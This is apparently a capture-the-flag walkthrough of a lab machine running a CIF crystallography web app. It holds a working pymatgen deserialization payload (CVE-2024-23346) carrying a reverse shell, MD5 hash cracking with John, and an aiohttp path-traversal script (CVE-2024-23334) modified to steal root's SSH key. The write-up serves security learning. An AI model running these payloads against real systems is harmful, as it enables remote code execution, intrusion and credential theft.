Recon
Nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b6:fc:20:ae:9d:1d:45:1d:0b:ce:d9:d0:20:f2:6f:dc (RSA)
| 256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
|_ 256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
5000/tcp open upnp?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/3.0.3 Python/3.9.5
| Date: Sun, 20 Oct 2024 08:04:45 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 719
| Vary: Cookie
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Chemistry - Home</title>
| <link rel="stylesheet" href="/static/styles.css">
| </head>
| <body>
| <div class="container">
| class="title">Chemistry CIF Analyzer</h1>
| <p>Welcome to the Chemistry CIF Analyzer. This tool allows you to upload a CIF (Crystallographic Information File) and analyze the structural data contained within.</p>
| <div class="buttons">
| <center><a href="/login" class="btn">Login</a>
| href="/register" class="btn">Register</a></center>
| </div>
| </div>
| </body>
| RTSPRequest:
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request version ('RTSP/1.0').</p>
| <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
Werkzeug Web Server (Port 5000):
- The Python-based web server suggests a custom or lightweight web application, in this case, a "Chemistry CIF Analyzer."
- Potential vectors include analyzing how it handles file uploads (CIF file).
Port 5000 | CIF

A CIF (Crystallographic Information File) is a standard text file format used in crystallography to store and exchange crystallographic data. This format organizes information primarily about crystal structures such as atomic coordinates, cell dimensions, symmetry operations, and other details related to the material's three-dimensional atomic arrangement.
- Structure: CIF files are structured in a way that they can be easily read both by humans and machines. The format is tag-based, similar to XML or JSON, with specific data items identified by unique tags.
- Data Types: They can include a wide range of data, from chemical composition and crystal symmetry to detailed atomic coordinates and temperature factors.
- Extensibility: The format is extensible, allowing for the inclusion of new data items as crystallography evolves.
The process might seem a bit intricate, but let's perform a test first. Head over to the Crystallography Open Database and select a CIF file for download. Once we've got the file, create a new account on the server, then upload it. This will allow us to test how the server handles CIF uploads, potentially revealing critical insights into its processing flow:

Upon uploading the CIF file, the server returns a 404 error, but interestingly, it reveals the path /structure
for handling uploaded files:

Additionally, the website offers a sample CIF file at address http://chemistry.htb:5000/static/example.cif:
data_Example
_cell_length_a 10.00000
_cell_length_b 10.00000
_cell_length_c 10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta 90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
_atom_site_label
_atom_site_fract_x
_atom_site_fract_y
_atom_site_fract_z
_atom_site_occupancy
H 0.00000 0.00000 0.00000 1
O 0.50000 0.50000 0.50000 1
Which can be successfully parsed by the server:

The web server itself is running Werkzeug 3.0.3 with Python 3.9.5, an outdated version known to have potential vulnerabilities. This setup could provide an attack surface for further exploration, particularly in the way the server parses and handles CIF files:

Deserialization | Web
CVE-2024-23346
Depends on the information we got in reconnaissance, we know that the server is parsing CIF data under the /structure
path, and running an old version of python3.9.5 which may serves some obsolete and vulnerable libraries.
When we uploaded the example CIF to the server, and was successfully parsed, we can observe that:
- The lattice parameters and atomic site data (positions of atoms in above crystal structure) resemble the kind of structured output that
pymatgen
could generate from a CIF file. If the file upload parses these parameters from a CIF file and presents them in this format, it suggests that a crystallographic library likepymatgen
is being used. pymatgen
would extract lattice parameters (a
,b
,c
,α
,β
,γ
), atomic coordinates (x
,y
,z
), and chemical formula (H1 O1
), just as shown in the response.- The atomic sites (positions
x
,y
,z
for each atom) for atoms labeledH
andO
. This is exactly the kind of output thatpymatgen
produces after parsing a CIF file. It extracts these details and allows for easy presentation in web applications.
The web server is running Werkzeug 3.0.3 on Python 3.9.5, which is a suitable setup for leveraging pymatgen
, a powerful Python library for parsing CIF files. However, the outdated server configuration might introduce some potential risks.
Specifically, CVE-2024-23346 could be relevant here, as it impacts older versions of Python servers. This gives us a strategic opportunity to investigate further, potentially exploiting weaknesses within the server's parsing mechanisms. This article introduces Arbitrary Code Execution in Pymatgen via Insecure Deserialization.
Pymatgen
The CIF (Crystallographic Information File) format is highly relevant when working with pymatgen
(Python Materials Genomics), a robust library in Python used for materials analysis.
Integration of CIF files with pymatgen
:
- Structure Loading and Manipulation:
pymatgen
can read CIF files to load crystallographic structures into Python objects. It allows researchers and developers to manipulate these structures programmatically. - Materials Property Calculation: Once the structure is loaded from a CIF file,
pymatgen
can be used to calculate a wide range of materials properties, such as electronic band structure, density of states, and dynamic stability. - Materials Analysis:
pymatgen
includes modules for analyzing crystal symmetry, exploring phase diagrams, and generating pourbaix diagrams. - Visualization: Through integration with visualization libraries,
pymatgen
can be used to generate visual representations of the structures loaded from CIF files. This is helpful a more intuitive understanding of complex crystal structures. - Automation in Materials Discovery:
pymatgen
plays a crucial role in high-throughput materials discovery workflows. It can automate the generation of inputs for simulations, manage computational jobs, and analyze outputs.
To better understand how the server operates, let's look at an example that shows how it uses the pymatgen
library:
from pymatgen.io.cif import CifParser
# Load a CIF file
parser = CifParser("<path>/<CIF>")
structure = parser.get_structures()[0]
# Print the structure summary
print(structure)
# Calculate and print the space group
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer
space_group_analyzer = SpacegroupAnalyzer(structure)
print("Space group:", space_group_analyzer.get_space_group_symbol())
The server loads a crystal structure from a CIF file, extracts key details, and identifies its space group using pymatgen
's built-in functionality.
Given the potential vulnerabilities, especially with older configurations, it's worth noting that installing a version of pymatgen
prior to 2024.2.8 aligns with the proof of concept (PoC) and might allow us to explore possible weaknesses in the system further:

To test the Python script with real-world data, we can replace the file path and CIF file name to reflect the actual file we downloaded from the web app:

It extracts and displays the crystal structure details, allowing us to validate the behavior of the server when it parses the CIF file.
Exploit
Original POC from the CVE:
data_5yOhtAoR
_audit_creation_date 2018-06-08
_audit_creation_method "Pymatgen CIF Parser Arbitrary Code Execution Exploit"
loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in
().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" +
"classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("touch
pwned");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
Our target server will return a 404 error, similar to what we observed when uploading a random CIF file earlier. This happens because the data structure is NOT recognized by the pymatgen
library on the backend.
To bypass this, we need to provide a valid Crystallographic data structure and embed our malicious deserialization payload within it. Since the Crystallographic data structure is extensible, we can modify the example.cif
file to include a reverse shell payload:
# example.cif
data_Example
_cell_length_a 10.00000
_cell_length_b 10.00000
_cell_length_c 10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta 90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
_atom_site_label
_atom_site_fract_x
_atom_site_fract_y
_atom_site_fract_z
_atom_site_occupancy
H 0.00000 0.00000 0.00000 1
O 0.50000 0.50000 0.50000 1
# payload
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c \'sh -i >& /dev/tcp/10.10.▒▒.▒▒/4444 0>&1\'");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
It no longer returns 404, but 500 (Internal Server Error). Set up listener in advance, and we have a reverse shell for the app account:

Crack Hash | Rosa
Our next target will be user rosa:

The web root often reveals sensitive information, such as configuration or database files. In this case, under the path /home/app/instance/
, we find a database.db
file:

Download the file to our attack machine and dump it, we have the hashes for all registered users:

And we know these are MD5 hashes:

We can use John to crack them easily. Save the hashes into a TXT file:
admin:2861debaf8d99436a10e▒▒▒▒▒▒▒▒▒▒▒▒
app:197865e46b878d9e74a0▒▒▒▒▒▒▒▒▒▒▒▒
rosa:63ed86ee9f624c7b14f1▒▒▒▒▒▒▒▒▒▒▒▒
robert:02fcf7cfc10adc37959▒▒▒▒▒▒▒▒▒▒▒▒
jobert:3dec299e06f7ed187b▒▒▒▒▒▒▒▒▒▒▒▒
carlos:9ad48828b0955513f7▒▒▒▒▒▒▒▒▒▒▒▒
peter:6845c17d298d95aa942▒▒▒▒▒▒▒▒▒▒▒▒
victoria:c3601ad2286a4293868▒▒▒▒▒▒▒▒▒▒▒▒
tania:a4aa55e816205dc0389591▒▒▒▒▒▒▒▒▒▒▒▒
eusebio:6cad48078d0241cca9a7b3▒▒▒▒▒▒▒▒▒▒▒▒
gelacia:4af70c80b68267012ecd▒▒▒▒▒▒▒▒▒▒▒▒
fabian:4e5d71f53fdd2eabdba▒▒▒▒▒▒▒▒▒▒▒▒
axel:9347f9724ca083b17e395▒▒▒▒▒▒▒▒▒▒▒▒
kristel:6896ba7b11a62cacf▒▒▒▒▒▒▒▒▒▒▒▒
Then run John:
john hashes.txt --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt
Roast the hashes, we've successfully cracked the plain-text password for our target user rosa:

Reuse the password for SSH login, we compromise the rosa account, and take the user flag:

Aiohttp | Root
Enumerate the machine with Linpeas, we can take a look at the current processes:

And netstat
ports:

The target is straightforward: there's an active, suspicious port 8080 running. Set up port forwarding and check the service.
ssh -L 1337:127.0.0.1:8080 [email protected]
Once tunneled, visit the port in our browser to find a monitoring service:

Observe the network traffic in BurpSuite:

Server Python/3.9 aiohttp/3.9.1
indicates that the service is built using aiohttp
, a Python asynchronous framework commonly used for building web applications and APIs.
aiohttp
is a popular asynchronous HTTP client-server framework in Python that is designed to handle asynchronous requests efficiently, making it suitable for building scalable web applications, APIs, and services that require high concurrency. It is often used to create non-blocking, event-driven applications where tasks such as network communication, database queries, or file operations can be handled concurrently without waiting for each task to finish before starting the next.
As the exploit in pytmatgen
library, this is also an old-version python server, which is subjected to CVE-2024-23334, with a POC found on Github.
CVE-2024-23334 is a directory traversal vulnerability in versions of the aiohttp
library up to 3.9.1
. The vulnerability occurs when aiohttp
is used to serve static files, and the follow_symlinks
option is set to True
. This configuration allows attackers to bypass the static root directory and access arbitrary files on the server's filesystem, potentially exposing sensitive information.
The PoC on GitHub is purely for demonstration, meaning we don't need to set up the server on our attack machine—the target server handles that. Let's take a look at the exploit.sh
script:
#!/bin/bash
url="http://localhost:8081"
string="../"
payload="/static/"
file="etc/passwd" # without the first /
for ((i=0; i<15; i++)); do
payload+="$string"
echo "[+] Testing with $payload$file"
status_code=$(curl --path-as-is -s -o /dev/null -w "%{http_code}" "$url$payload$file")
echo -e "\tStatus code --> $status_code"
if [[ $status_code -eq 200 ]]; then
curl -s --path-as-is "$url$payload$file"
break
fi
done
payload="/static/"
: This is the starting point for the payload, indicating the script begins the traversal at the/static/
directory, which is often used to serve static content.file="etc/passwd"
: This is the target file for leaking.- The loop attempts up to 15 levels of directory traversal (adding
../
to thepayload
each time) to move up in the file structure from the/static/
directory. curl --path-as-is -s -o /dev/null -w "%{http_code}" "$url$payload$file"
: This command makes an HTTP request to the server using thecurl
tool. The--path-as-is
option allows sending the raw path (which includes../
for directory traversal) without curl URL-encoding it.
In our attack scenario, port 8080
is serving, and our target file could be something like /root/.ssh/id_rsa
. The static directory /assets
was revealed through network traffic analysis. Now, we can proceed by modifying the exploit.sh
script:
#!/bin/bash
url="http://localhost:8080"
string="../"
payload="/assets/"
file="root/.ssh/id_rsa" # without the leading /
for ((i=0; i<15; i++)); do
payload+="$string"
echo "[+] Testing with $payload$file"
status_code=$(curl --path-as-is -s -o /dev/null -w "%{http_code}" "$url$payload$file")
echo -e "\tStatus code --> $status_code"
if [[ $status_code -eq 200 ]]; then
echo "[+] File found, downloading contents..."
curl -s --path-as-is "$url$payload$file"
break
fi
done
Bingo:

Use the private key to SSH login as root user:

Rooted.
Comments | NOTHING